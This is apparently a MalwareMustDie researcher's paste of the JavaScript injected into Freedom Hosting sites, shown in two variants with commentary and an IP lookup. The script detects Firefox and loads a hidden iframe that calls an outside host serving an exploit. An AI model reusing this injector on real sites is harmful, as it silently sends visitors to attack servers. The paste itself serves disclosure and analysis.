Freedom Hosting FBI IFRAME Redirector Malware Script

1. # MalwareMustDie!
2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
3. # It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
5. #
6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
13. # Ref: http://pastebin.com/bu2Ya0n6
14. # Ref: http://pastebin.com/pmGEj9bV
15.  
16. // Case 1
17.  
18.     function createCookie(name,value,minutes) {
19.             if (minutes) {
20.                     var date = new Date();
21.                     date.setTime(date.getTime()+(minutes*60*1000));
22.                     var expires = "; expires="+date.toGMTString();
23.             }
24.             else var expires = "";
25.             document.cookie = name+"="+value+expires+"; path=/";
26.     }
27.      
28.     function readCookie(name) {
29.         var nameEQ = name + "=";
30.         var ca = document.cookie.split(';');
31.         for(var i=0;i < ca.length;i++) {
32.             var c = ca[i];
33.             while (c.charAt(0)==' ') c = c.substring(1,c.length);
34.             if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
35.         }
36.         return null;
37.     }
38.      
39.     function isFF() {
40.         return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
41.     }
42.      
43.     function updatify() {
44.         var iframe = document.createElement('iframe');
45.         iframe.style.display = "inline";
46.         iframe.frameBorder = "0";
47.         iframe.scrolling = "no";
48.         iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
49.         iframe.height = "5";
50.         iframe.width = "*";
51.         document.body.appendChild(iframe);
52.     }
53.      
54.     function format_quick() {
55.         if ( ! readCookie("n_serv") ) {
56.             createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
57.             updatify();
58.         }
59.     }
60.      
61.     function isReady()
62.     {
63.         if ( document.readyState === "interactive" || document.readyState === "complete" ) {
64.      
65.             if ( isFF() ) {
66.                 format_quick();
67.             }
68.         }
69.         else
70.         {
71.             setTimeout(isReady, 250);
72.         }
73.     }
74.     setTimeout(isReady, 250);
75.  
76.  
77. // Case 2
78.  
79. function createCookie(name, value, minutes) {
80.     if (minutes) {
81.         var date = new Date();
82.         date.setTime(date.getTime() + (minutes * 60 * 1000));
83.         var expires = "; expires=" + date.toGMTString();
84.     } else var expires = "";
85.     document.cookie = name + "=" + value + expires + "; path=/";
86. }
87.  
88. function readCookie(name) {
89.     var nameEQ = name + "=";
90.     var ca = document.cookie.split(';');
91.     for (var i = 0; i < ca.length; i++) {
92.         var c = ca[i];
93.         while (c.charAt(0) == ' ') c = c.substring(1, c.length);
94.         if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
95.     }
96.     return null;
97. }
98.  
99. function isFF() {
100.     return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
101. }
102.  
103. function updatify() {
104.     var iframe = document.createElement('iframe');
105.     iframe.style.display = "inline";
106.     iframe.frameBorder = "0";
107.     iframe.scrolling = "no";
108.     iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
109.     iframe.height = "5";
110.     iframe.width = "*";
111.     document.body.appendChild(iframe);
112. }
113.  
114. function freedomhost() {
115.     if (!readCookie("n_serv")) {
116.         createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
117.         updatify();
118.     }
119. }
120.  
121. function isReady() {
122.     if (document.readyState === "interactive" || document.readyState === "complete") {
123.         if (isFF()) {
124.             //window.alert(window.location + "Firefox Detected.")
125.             freedomhost();
126.         }
127.     } else {
128.         setTimeout(isReady, 250);
129.     }
130. }
131. setTimeout(isReady, 250);
132.  
133. // Noted, same method,
134. // second script is w/IP info callback, contacting remote host as per marked (1)
135.  
136.   IP Address: 65.222.202.53
137.   City: Triadelphia
138.   State or Region: West Virginia
139.   Country: United States
140.   ISP: Verizon Business
141.   Latitude & Longitude: 40.0900-80.6220
142.   Domain: verizonbusiness.com
143.   ZIP Code: 26059
144.  
145. ---
146. #MalwareMustDie! @unixfreaxjp